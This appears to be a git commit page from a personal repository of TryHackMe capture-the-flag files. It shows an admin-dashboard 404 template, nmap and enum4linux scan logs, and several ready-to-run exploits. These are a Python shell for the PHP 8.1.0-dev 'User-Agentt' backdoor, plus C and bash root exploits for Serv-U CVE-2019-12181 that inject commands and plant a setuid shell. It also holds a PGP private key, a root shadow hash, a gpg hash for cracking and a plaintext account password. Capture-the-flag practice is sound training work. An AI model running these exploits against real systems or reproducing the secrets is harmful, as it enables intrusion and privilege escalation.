curo/TryHackMe
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

initial commit

Browse Source
This commit is contained in:
Curo
2025-12-04 09:57:17 +01:00
commit 0054cc02b1
4851 changed files with 4416257 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

430
CTF/AgentT/404.html Normal file
View File

@@ -0,0 +1,430 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<title>SB Admin 2 - 404</title>
<!-- Custom fonts for this template-->
<link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
<link
href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i"
rel="stylesheet">
<!-- Custom styles for this template-->
<link href="css/sb-admin-2.min.css" rel="stylesheet">
</head>
<body id="page-top">
<!-- Page Wrapper -->
<div id="wrapper">
<!-- Sidebar -->
<ul class="navbar-nav bg-gradient-primary sidebar sidebar-dark accordion" id="accordionSidebar">
<!-- Sidebar - Brand -->
<a class="sidebar-brand d-flex align-items-center justify-content-center" href="index.html">
<div class="sidebar-brand-icon rotate-n-15">
<i class="fas fa-laugh-wink"></i>
</div>
<div class="sidebar-brand-text mx-3">SB Admin <sup>2</sup></div>
</a>
<!-- Divider -->
<hr class="sidebar-divider my-0">
<!-- Nav Item - Dashboard -->
<li class="nav-item">
<a class="nav-link" href="index.html">
<i class="fas fa-fw fa-tachometer-alt"></i>
<span>Dashboard</span>
</a>
</li>
<!-- Divider -->
<hr class="sidebar-divider">
<!-- Heading -->
<div class="sidebar-heading">
Interface
</div>
<!-- Nav Item - Pages Collapse Menu -->
<li class="nav-item">
<a class="nav-link collapsed" href="#" data-toggle="collapse" data-target="#collapseTwo"
aria-expanded="true" aria-controls="collapseTwo">
<i class="fas fa-fw fa-cog"></i>
<span>Components</span>
</a>
<div id="collapseTwo" class="collapse" aria-labelledby="headingTwo" data-parent="#accordionSidebar">
<div class="bg-white py-2 collapse-inner rounded">
<h6 class="collapse-header">Custom Components:</h6>
<a class="collapse-item" href="buttons.html">Buttons</a>
<a class="collapse-item" href="cards.html">Cards</a>
</div>
</div>
</li>
<!-- Nav Item - Utilities Collapse Menu -->
<li class="nav-item">
<a class="nav-link collapsed" href="#" data-toggle="collapse" data-target="#collapseUtilities"
aria-expanded="true" aria-controls="collapseUtilities">
<i class="fas fa-fw fa-wrench"></i>
<span>Utilities</span>
</a>
<div id="collapseUtilities" class="collapse" aria-labelledby="headingUtilities"
data-parent="#accordionSidebar">
<div class="bg-white py-2 collapse-inner rounded">
<h6 class="collapse-header">Custom Utilities:</h6>
<a class="collapse-item" href="utilities-color.html">Colors</a>
<a class="collapse-item" href="utilities-border.html">Borders</a>
<a class="collapse-item" href="utilities-animation.html">Animations</a>
<a class="collapse-item" href="utilities-other.html">Other</a>
</div>
</div>
</li>
<!-- Divider -->
<hr class="sidebar-divider">
<!-- Heading -->
<div class="sidebar-heading">
Addons
</div>
<!-- Nav Item - Pages Collapse Menu -->
<li class="nav-item active">
<a class="nav-link" href="#" data-toggle="collapse" data-target="#collapsePages" aria-expanded="true"
aria-controls="collapsePages">
<i class="fas fa-fw fa-folder"></i>
<span>Pages</span>
</a>
<div id="collapsePages" class="collapse show" aria-labelledby="headingPages"
data-parent="#accordionSidebar">
<div class="bg-white py-2 collapse-inner rounded">
<h6 class="collapse-header">Login Screens:</h6>
<a class="collapse-item" href="login.html">Login</a>
<a class="collapse-item" href="register.html">Register</a>
<a class="collapse-item" href="forgot-password.html">Forgot Password</a>
<div class="collapse-divider"></div>
<h6 class="collapse-header">Other Pages:</h6>
<a class="collapse-item active" href="404.html">404 Page</a>
<a class="collapse-item" href="blank.html">Blank Page</a>
</div>
</div>
</li>
<!-- Nav Item - Charts -->
<li class="nav-item">
<a class="nav-link" href="charts.html">
<i class="fas fa-fw fa-chart-area"></i>
<span>Charts</span></a>
</li>
<!-- Nav Item - Tables -->
<li class="nav-item">
<a class="nav-link" href="tables.html">
<i class="fas fa-fw fa-table"></i>
<span>Tables</span></a>
</li>
<!-- Divider -->
<hr class="sidebar-divider d-none d-md-block">
<!-- Sidebar Toggler (Sidebar) -->
<div class="text-center d-none d-md-inline">
<button class="rounded-circle border-0" id="sidebarToggle"></button>
</div>
</ul>
<!-- End of Sidebar -->
<!-- Content Wrapper -->
<div id="content-wrapper" class="d-flex flex-column">
<!-- Main Content -->
<div id="content">
<!-- Topbar -->
<nav class="navbar navbar-expand navbar-light bg-white topbar mb-4 static-top shadow">
<!-- Sidebar Toggle (Topbar) -->
<button id="sidebarToggleTop" class="btn btn-link d-md-none rounded-circle mr-3">
<i class="fa fa-bars"></i>
</button>
<!-- Topbar Search -->
<form
class="d-none d-sm-inline-block form-inline mr-auto ml-md-3 my-2 my-md-0 mw-100 navbar-search">
<div class="input-group">
<input type="text" class="form-control bg-light border-0 small" placeholder="Search for..."
aria-label="Search" aria-describedby="basic-addon2">
<div class="input-group-append">
<button class="btn btn-primary" type="button">
<i class="fas fa-search fa-sm"></i>
</button>
</div>
</div>
</form>
<!-- Topbar Navbar -->
<ul class="navbar-nav ml-auto">
<!-- Nav Item - Search Dropdown (Visible Only XS) -->
<li class="nav-item dropdown no-arrow d-sm-none">
<a class="nav-link dropdown-toggle" href="#" id="searchDropdown" role="button"
data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
<i class="fas fa-search fa-fw"></i>
</a>
<!-- Dropdown - Messages -->
<div class="dropdown-menu dropdown-menu-right p-3 shadow animated--grow-in"
aria-labelledby="searchDropdown">
<form class="form-inline mr-auto w-100 navbar-search">
<div class="input-group">
<input type="text" class="form-control bg-light border-0 small"
placeholder="Search for..." aria-label="Search"
aria-describedby="basic-addon2">
<div class="input-group-append">
<button class="btn btn-primary" type="button">
<i class="fas fa-search fa-sm"></i>
</button>
</div>
</div>
</form>
</div>
</li>
<!-- Nav Item - Alerts -->
<li class="nav-item dropdown no-arrow mx-1">
<a class="nav-link dropdown-toggle" href="#" id="alertsDropdown" role="button"
data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
<i class="fas fa-bell fa-fw"></i>
<!-- Counter - Alerts -->
<span class="badge badge-danger badge-counter">3+</span>
</a>
<!-- Dropdown - Alerts -->
<div class="dropdown-list dropdown-menu dropdown-menu-right shadow animated--grow-in"
aria-labelledby="alertsDropdown">
<h6 class="dropdown-header">
Alerts Center
</h6>
<a class="dropdown-item d-flex align-items-center" href="#">
<div class="mr-3">
<div class="icon-circle bg-primary">
<i class="fas fa-file-alt text-white"></i>
</div>
</div>
<div>
<div class="small text-gray-500">December 12, 2019</div>
<span class="font-weight-bold">A new monthly report is ready to download!</span>
</div>
</a>
<a class="dropdown-item d-flex align-items-center" href="#">
<div class="mr-3">
<div class="icon-circle bg-success">
<i class="fas fa-donate text-white"></i>
</div>
</div>
<div>
<div class="small text-gray-500">December 7, 2019</div>
$290.29 has been deposited into your account!
</div>
</a>
<a class="dropdown-item d-flex align-items-center" href="#">
<div class="mr-3">
<div class="icon-circle bg-warning">
<i class="fas fa-exclamation-triangle text-white"></i>
</div>
</div>
<div>
<div class="small text-gray-500">December 2, 2019</div>
Spending Alert: We've noticed unusually high spending for your account.
</div>
</a>
<a class="dropdown-item text-center small text-gray-500" href="#">Show All Alerts</a>
</div>
</li>
<!-- Nav Item - Messages -->
<li class="nav-item dropdown no-arrow mx-1">
<a class="nav-link dropdown-toggle" href="#" id="messagesDropdown" role="button"
data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
<i class="fas fa-envelope fa-fw"></i>
<!-- Counter - Messages -->
<span class="badge badge-danger badge-counter">7</span>
</a>
<!-- Dropdown - Messages -->
<div class="dropdown-list dropdown-menu dropdown-menu-right shadow animated--grow-in"
aria-labelledby="messagesDropdown">
<h6 class="dropdown-header">
Message Center
</h6>
<a class="dropdown-item d-flex align-items-center" href="#">
<div class="dropdown-list-image mr-3">
<img class="rounded-circle" src="img/undraw_profile_1.svg"
alt="...">
<div class="status-indicator bg-success"></div>
</div>
<div class="font-weight-bold">
<div class="text-truncate">Hi there! I am wondering if you can help me with a
problem I've been having.</div>
<div class="small text-gray-500">Emily Fowler · 58m</div>
</div>
</a>
<a class="dropdown-item d-flex align-items-center" href="#">
<div class="dropdown-list-image mr-3">
<img class="rounded-circle" src="img/undraw_profile_2.svg"
alt="...">
<div class="status-indicator"></div>
</div>
<div>
<div class="text-truncate">I have the photos that you ordered last month, how
would you like them sent to you?</div>
<div class="small text-gray-500">Jae Chun · 1d</div>
</div>
</a>
<a class="dropdown-item d-flex align-items-center" href="#">
<div class="dropdown-list-image mr-3">
<img class="rounded-circle" src="img/undraw_profile_3.svg"
alt="...">
<div class="status-indicator bg-warning"></div>
</div>
<div>
<div class="text-truncate">Last month's report looks great, I am very happy with
the progress so far, keep up the good work!</div>
<div class="small text-gray-500">Morgan Alvarez · 2d</div>
</div>
</a>
<a class="dropdown-item d-flex align-items-center" href="#">
<div class="dropdown-list-image mr-3">
<img class="rounded-circle" src="https://source.unsplash.com/Mv9hjnEUHR4/60x60"
alt="...">
<div class="status-indicator bg-success"></div>
</div>
<div>
<div class="text-truncate">Am I a good boy? The reason I ask is because someone
told me that people say this to all dogs, even if they aren't good...</div>
<div class="small text-gray-500">Chicken the Dog · 2w</div>
</div>
</a>
<a class="dropdown-item text-center small text-gray-500" href="#">Read More Messages</a>
</div>
</li>
<div class="topbar-divider d-none d-sm-block"></div>
<!-- Nav Item - User Information -->
<li class="nav-item dropdown no-arrow">
<a class="nav-link dropdown-toggle" href="#" id="userDropdown" role="button"
data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
<span class="mr-2 d-none d-lg-inline text-gray-600 small">Douglas McGee</span>
<img class="img-profile rounded-circle"
src="img/undraw_profile.svg">
</a>
<!-- Dropdown - User Information -->
<div class="dropdown-menu dropdown-menu-right shadow animated--grow-in"
aria-labelledby="userDropdown">
<a class="dropdown-item" href="#">
<i class="fas fa-user fa-sm fa-fw mr-2 text-gray-400"></i>
Profile
</a>
<a class="dropdown-item" href="#">
<i class="fas fa-cogs fa-sm fa-fw mr-2 text-gray-400"></i>
Settings
</a>
<a class="dropdown-item" href="#">
<i class="fas fa-list fa-sm fa-fw mr-2 text-gray-400"></i>
Activity Log
</a>
<div class="dropdown-divider"></div>
<a class="dropdown-item" href="#" data-toggle="modal" data-target="#logoutModal">
<i class="fas fa-sign-out-alt fa-sm fa-fw mr-2 text-gray-400"></i>
Logout
</a>
</div>
</li>
</ul>
</nav>
<!-- End of Topbar -->
<!-- Begin Page Content -->
<div class="container-fluid">
<!-- 404 Error Text -->
<div class="text-center">
<div class="error mx-auto" data-text="404">404</div>
<p class="lead text-gray-800 mb-5">Page Not Found</p>
<p class="text-gray-500 mb-0">It looks like you found a glitch in the matrix...</p>
<a href="index.html">&larr; Back to Dashboard</a>
</div>
</div>
<!-- /.container-fluid -->
</div>
<!-- End of Main Content -->
<!-- Footer -->
<footer class="sticky-footer bg-white">
<div class="container my-auto">
<div class="copyright text-center my-auto">
<span>Copyright &copy; Your Website 2020</span>
</div>
</div>
</footer>
<!-- End of Footer -->
</div>
<!-- End of Content Wrapper -->
</div>
<!-- End of Page Wrapper -->
<!-- Scroll to Top Button-->
<a class="scroll-to-top rounded" href="#page-top">
<i class="fas fa-angle-up"></i>
</a>
<!-- Logout Modal-->
<div class="modal fade" id="logoutModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel"
aria-hidden="true">
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="exampleModalLabel">Ready to Leave?</h5>
<button class="close" type="button" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body">Select "Logout" below if you are ready to end your current session.</div>
<div class="modal-footer">
<button class="btn btn-secondary" type="button" data-dismiss="modal">Cancel</button>
<a class="btn btn-primary" href="login.html">Logout</a>
</div>
</div>
</div>
</div>
<!-- Bootstrap core JavaScript-->
<script src="vendor/jquery/jquery.min.js"></script>
<script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
<!-- Core plugin JavaScript-->
<script src="vendor/jquery-easing/jquery.easing.min.js"></script>
<!-- Custom scripts for all pages-->
<script src="js/sb-admin-2.min.js"></script>
</body>
</html>

53
CTF/AgentT/exploit.py Executable file
View File

@@ -0,0 +1,53 @@
# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
# - https://hub.docker.com/r/phpdaily/php
# - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# References:
# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
"""
#!/usr/bin/env python3
import os
import re
import requests
host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)
if str(response) == '<Response [200]>':
print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
try:
while 1:
cmd = input("$ ")
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"User-Agentt": "zerodiumsystem('" + cmd + "');"
}
response = request.get(host, headers = headers, allow_redirects = False)
current_page = response.text
stdout = current_page.split('<!DOCTYPE html>',1)
text = print(stdout[0])
except KeyboardInterrupt:
print("Exiting...")
exit
else:
print("\r")
print(response)
print("Host is not available, aborting...")
exit

1
CTF/AgentT/file_fuzz1.txt Normal file
View File

File diff suppressed because one or more lines are too long

0
CTF/AgentT/gobuster_scan1.txt Normal file
View File

20
CTF/AgentT/nmap_scan1.txt Normal file
View File

@@ -0,0 +1,20 @@
# Nmap 7.95 scan initiated Fri Oct 17 18:55:52 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -oN nmap_scan1.txt 10.10.8.207
Nmap scan report for 10.10.8.207
Host is up (0.079s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title: Admin Dashboard
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 70.82 ms 10.14.0.1
2 63.59 ms 10.10.8.207
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 17 18:56:08 2025 -- 1 IP address (1 host up) scanned in 15.23 seconds

BIN
CTF/Anonforce/backup.pgp Normal file
View File

Binary file not shown.

24
CTF/Anonforce/exploit.c Normal file
View File

@@ -0,0 +1,24 @@
/*
CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation
vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe
*/
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
int main()
{
char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
// if execv is successful, we won't reach here
printf("ret val: %d errno: %d\n", ret_val, errno);
return errno;
}

37
CTF/Anonforce/exploit.sh Executable file
View File

@@ -0,0 +1,37 @@
#!/bin/bash
# SUroot - Local root exploit for Serv-U FTP Server versions prior to 15.1.7 (CVE-2019-12181)
# Bash variant of Guy Levin's Serv-U FTP Server exploit:
# - https://github.com/guywhataguy/CVE-2019-12181
# ---
# user@debian-9-6-0-x64-xfce:~/Desktop$ ./SUroot
# [*] Launching Serv-U ...
# sh: 1: : Permission denied
# [+] Success:
# -rwsr-xr-x 1 root root 117208 Jun 28 23:21 /tmp/sh
# [*] Launching root shell: /tmp/sh
# sh-4.4# id
# uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),117(scanner)
# ---
# <bcoles@gmail.com>
# https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181
if ! test -u "/usr/local/Serv-U/Serv-U"; then
echo '[-] /usr/local/Serv-U/Serv-U is not setuid root'
exit 1
fi
echo "[*] Launching Serv-U ..."
/bin/bash -c 'exec -a "\";cp /bin/bash /tmp/sh; chown root /tmp/sh; chmod u+sx /tmp/sh;\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
if ! test -u "/tmp/sh"; then
echo '[-] Failed'
/bin/rm "/tmp/sh"
exit 1
fi
echo '[+] Success:'
/bin/ls -la /tmp/sh
echo "[*] Launching root shell: /tmp/sh"
/tmp/sh -p

60
CTF/Anonforce/nmap_scan1.txt Normal file
View File

@@ -0,0 +1,60 @@
# Nmap 7.95 scan initiated Fri Oct 17 19:15:33 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -oN nmap_scan1.txt 10.10.210.93
Nmap scan report for 10.10.210.93
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 0 0 4096 Aug 11 2019 bin
| drwxr-xr-x 3 0 0 4096 Aug 11 2019 boot
| drwxr-xr-x 17 0 0 3700 Oct 17 10:13 dev
| drwxr-xr-x 85 0 0 4096 Aug 13 2019 etc
| drwxr-xr-x 3 0 0 4096 Aug 11 2019 home
| lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img -> boot/initrd.img-4.4.0-157-generic
| lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic
| drwxr-xr-x 19 0 0 4096 Aug 11 2019 lib
| drwxr-xr-x 2 0 0 4096 Aug 11 2019 lib64
| drwx------ 2 0 0 16384 Aug 11 2019 lost+found
| drwxr-xr-x 4 0 0 4096 Aug 11 2019 media
| drwxr-xr-x 2 0 0 4096 Feb 26 2019 mnt
| drwxrwxrwx 2 1000 1000 4096 Aug 11 2019 notread [NSE: writeable]
| drwxr-xr-x 2 0 0 4096 Aug 11 2019 opt
| dr-xr-xr-x 95 0 0 0 Oct 17 10:13 proc
| drwx------ 3 0 0 4096 Aug 11 2019 root
| drwxr-xr-x 18 0 0 540 Oct 17 10:13 run
| drwxr-xr-x 2 0 0 12288 Aug 11 2019 sbin
| drwxr-xr-x 3 0 0 4096 Aug 11 2019 srv
| dr-xr-xr-x 13 0 0 0 Oct 17 10:13 sys
|_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.99.89
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:f9:48:3e:11:a1:aa:fc:b7:86:71:d0:2a:f6:24:e7 (RSA)
| 256 73:5d:de:9a:88:6e:64:7a:e1:87:ec:65:ae:11:93:e3 (ECDSA)
|_ 256 56:f9:9f:24:f1:52:fc:16:b7:7b:a3:e2:4f:17:b4:ea (ED25519)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 127.91 ms 10.14.0.1
2 127.72 ms 10.10.210.93
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 17 19:15:41 2025 -- 1 IP address (1 host up) scanned in 8.20 seconds

62
CTF/Anonforce/private.asc Normal file
View File

@@ -0,0 +1,62 @@
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG v1.56
lQOBBF1Q5b0RCACMPpWfiiRRNpQxK0kAhv2w69+5fSmbS4+4QxgoDsEBIITWNkAF
GTVoPBz3My0NzF4IN5GTspwgZtwFOeQixsuM41CiGQzqRMPHIuxwJeqjWfSaaVRP
6IXFMalaOnOg9CNmhljZIUdu2yLRClWBrmCFptFmhL6ONeP4tOCX9Vbok2TvFSdT
cbeXyOFraia9bAKtf9Ioky7Jyjao6Hf9XZ8o2k+lKVyaAkj/Vmxoo6DISHZZbMuJ
Hcwr86Dw7+agpqpX4hLvGoZASMrX/qpmWZrePtHw1wHuN9/vhu0QfFQRmTrxRrgz
73iazo3s6QDtDEWnakJf0FWw3YAqmZWbzXvdAQDCsrET6ESqWRweYj45mQimgGYq
snIw5fskEE4M1xQ5ywf/SXgpGC50Ffo27EEdtppnCZKjKicv53+6LXl8pV1zVs4r
3PCY0oI0xyYQzTvcfClGzBmCuUx6KdNXswlrqprTWT4K/NT54UbJ4QUjtr9unA2v
SJl/+T+e8IAdq+cifpONsbJ/PprDW+SYeBO4sKZJ4FQ34N7E6NsdgONQehQNn5tm
x1Zq6bqfsJ+GdE0RLjugRbNEtnRCf6pm573kWNqrZa38EuQtVxV8NmOyomFA0q5Z
FDZilngg9k5WcQLfvwWtbNdrPLe8p0iafEl70fYVuXDYo3LBFx6wG/H8fIJYs0JA
JPX8xVpFNgEti1nzJIB3iqVAootZhs3fM9BoOZ9IpAf+L3ILQU1xUljB1qB6lA9a
4RM3rjWeCqfulAHGrzJ9sKhNP35IQ084x+Pyx9KFbKgzDjeA3v3Rl27Iec887hMW
z8ZmvEu5+UBUys8SRB4rrtaF7KB3EM0fZCCettwukUasj0BsdAU9TcSEXFS++jkC
Fg2p8RGyDvVVIZMmI4kpyJwsKinZiNEWHbcpOWWkJ0H7AOjuXiqUE+DU7YueYVpi
cnqPsdzAnzbh18U5AapzSev4S/qQXDeGve5l4twUfseZKB5JqHThtpct2rH+hTXL
YRawy2DG+C8y/7sBX+kfybeKL5nY4e8Z1hoD+gGmSPwDS0APAzu/Y5DfIokvxLwF
uv4JAwLX0R2b9tCJaGBdBE2CV47MYrqqFcG88c/d5BmscV7VUZcSL9Csxkd4MiZt
uDtjo/DRa39fs9srk6aplQE7seev9pfngtUFiR7iYOlXE2V3tCJhbm9uZm9yY2Ug
PG1lbG9kaWFzQGFub25mb3JjZS5uc2E+iF4EExEIAAYFAl1Q5b0ACgkQuSzR8oCt
gsLtYAD+MnWnZUPILmIdWvDHmq8bk49tOjVfqru0e//luaBI2joA/juindQ78DzX
bQ6FQg8KKIqOcNo6cukKUQ6LlAfRVozlnQE/BF1Q5b0QAgCUlP7AlfO4XuKGVCs4
NvyBpd0KA0m0wjndOHRNSIz44x24vLfTO0GrueWjPMqRRLHO8zLJS/BXO/BHo6yp
jN87Af0VPV1hcq20MEW2iujh3hBwthNwBWhtKdPXOndJGZaB7lshLJuWv9z6WyDN
Xj/SBEiV1gnPm0ELeg8Syhy5pCjMAgCIVMI7XCQPUoTUUjx0OkGZgCIfwi3VhE3x
amMj9/jRdkMiru6VkQ99eHe7vBMU4o2fvkEc9OEJ7arSStx1kGaw/gkDAtfRHZv2
0IloYDNaPIv2qF/OvtZmtcw3Xyx6BsOtiEtlrr65+ksBIkDbA6R81qPV/FqaW4Ln
e2+g6wesYTM3pwaeQ+VGFDhkx4AuI0ncbba66jJY0/ywR6jRX91x2bemfspmkHhk
RD8+0br41bsLUYheBBgRCAAGBQJdUOW9AAoJELks0fKArYLCNqUBAJEvBOqOUm8z
e0LI7MiExxECea560p1r7WmEbKuKBeOPAPoDWDbsWSZpUq7Qj9CWla/vkGUs3ELd
ayAA8xm2L+QD7ZkDLgRdUOW9EQgAjD6Vn4okUTaUMStJAIb9sOvfuX0pm0uPuEMY
KA7BASCE1jZABRk1aDwc9zMtDcxeCDeRk7KcIGbcBTnkIsbLjONQohkM6kTDxyLs
cCXqo1n0mmlUT+iFxTGpWjpzoPQjZoZY2SFHbtsi0QpVga5ghabRZoS+jjXj+LTg
l/VW6JNk7xUnU3G3l8jha2omvWwCrX/SKJMuyco2qOh3/V2fKNpPpSlcmgJI/1Zs
aKOgyEh2WWzLiR3MK/Og8O/moKaqV+IS7xqGQEjK1/6qZlma3j7R8NcB7jff74bt
EHxUEZk68Ua4M+94ms6N7OkA7QxFp2pCX9BVsN2AKpmVm8173QEAwrKxE+hEqlkc
HmI+OZkIpoBmKrJyMOX7JBBODNcUOcsH/0l4KRgudBX6NuxBHbaaZwmSoyonL+d/
ui15fKVdc1bOK9zwmNKCNMcmEM073HwpRswZgrlMeinTV7MJa6qa01k+CvzU+eFG
yeEFI7a/bpwNr0iZf/k/nvCAHavnIn6TjbGyfz6aw1vkmHgTuLCmSeBUN+DexOjb
HYDjUHoUDZ+bZsdWaum6n7CfhnRNES47oEWzRLZ0Qn+qZue95Fjaq2Wt/BLkLVcV
fDZjsqJhQNKuWRQ2YpZ4IPZOVnEC378FrWzXazy3vKdImnxJe9H2Fblw2KNywRce
sBvx/HyCWLNCQCT1/MVaRTYBLYtZ8ySAd4qlQKKLWYbN3zPQaDmfSKQH/i9yC0FN
cVJYwdagepQPWuETN641ngqn7pQBxq8yfbCoTT9+SENPOMfj8sfShWyoMw43gN79
0ZduyHnPPO4TFs/GZrxLuflAVMrPEkQeK67WheygdxDNH2QgnrbcLpFGrI9AbHQF
PU3EhFxUvvo5AhYNqfERsg71VSGTJiOJKcicLCop2YjRFh23KTllpCdB+wDo7l4q
lBPg1O2LnmFaYnJ6j7HcwJ824dfFOQGqc0nr+Ev6kFw3hr3uZeLcFH7HmSgeSah0
4baXLdqx/oU1y2EWsMtgxvgvMv+7AV/pH8m3ii+Z2OHvGdYaA/oBpkj8A0tADwM7
v2OQ3yKJL8S8Bbq0ImFub25mb3JjZSA8bWVsb2RpYXNAYW5vbmZvcmNlLm5zYT6I
XgQTEQgABgUCXVDlvQAKCRC5LNHygK2Cwu1gAP4ydadlQ8guYh1a8MearxuTj206
NV+qu7R7/+W5oEjaOgD+O6Kd1DvwPNdtDoVCDwooio5w2jpy6QpRDouUB9FWjOW4
zARdUOW9EAIAlJT+wJXzuF7ihlQrODb8gaXdCgNJtMI53Th0TUiM+OMduLy30ztB
q7nlozzKkUSxzvMyyUvwVzvwR6OsqYzfOwH9FT1dYXKttDBFtoro4d4QcLYTcAVo
bSnT1zp3SRmWge5bISyblr/c+lsgzV4/0gRIldYJz5tBC3oPEsocuaQozAIAiFTC
O1wkD1KE1FI8dDpBmYAiH8It1YRN8WpjI/f40XZDIq7ulZEPfXh3u7wTFOKNn75B
HPThCe2q0krcdZBmsIheBBgRCAAGBQJdUOW9AAoJELks0fKArYLCNqUBAJEvBOqO
Um8ze0LI7MiExxECea560p1r7WmEbKuKBeOPAPoDWDbsWSZpUq7Qj9CWla/vkGUs
3ELdayAA8xm2L+QD7Q==
=Wwny
-----END PGP PRIVATE KEY BLOCK-----

1
CTF/Anonforce/privateJohn Normal file
View File

@@ -0,0 +1 @@
anonforce:$gpg$*17*54*2048*e419ac715ed55197122fd0acc6477832266db83b63a3f0d16b7f5fb3db2b93a6a995013bb1e7aff697e782d505891ee260e957136577*3*254*2*9*16*5d044d82578ecc62baaa15c1bcf1cfdd*65536*d7d11d9bf6d08968:::anonforce <melodias@anonforce.nsa>::private.asc

1
CTF/Anonforce/private_hash Normal file
View File

@@ -0,0 +1 @@
anonforce:$gpg$*17*54*2048*e419ac715ed55197122fd0acc6477832266db83b63a3f0d16b7f5fb3db2b93a6a995013bb1e7aff697e782d505891ee260e957136577*3*254*2*9*16*5d044d82578ecc62baaa15c1bcf1cfdd*65536*d7d11d9bf6d08968:::anonforce <melodias@anonforce.nsa>::private.asc

1
CTF/Anonforce/root_hash Normal file
View File

@@ -0,0 +1 @@
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::

1
CTF/AttacktiveDirectory/backup_creds.txt Normal file
View File

@@ -0,0 +1 @@
backup@spookysec.local:backup2517860

158
CTF/AttacktiveDirectory/enum4linux_scan1.txt Normal file
View File

@@ -0,0 +1,158 @@
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Oct 15 16:46:08 2025
 =========================================( Target Information )=========================================
Target ........... 10.10.241.222
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 ===========================( Enumerating Workgroup/Domain on 10.10.241.222 )===========================

[E] Can't find workgroup/domain

 ===============================( Nbtstat Information for 10.10.241.222 )===============================
Looking up status of 10.10.241.222
No reply from 10.10.241.222
 ===================================( Session Check on 10.10.241.222 )===================================

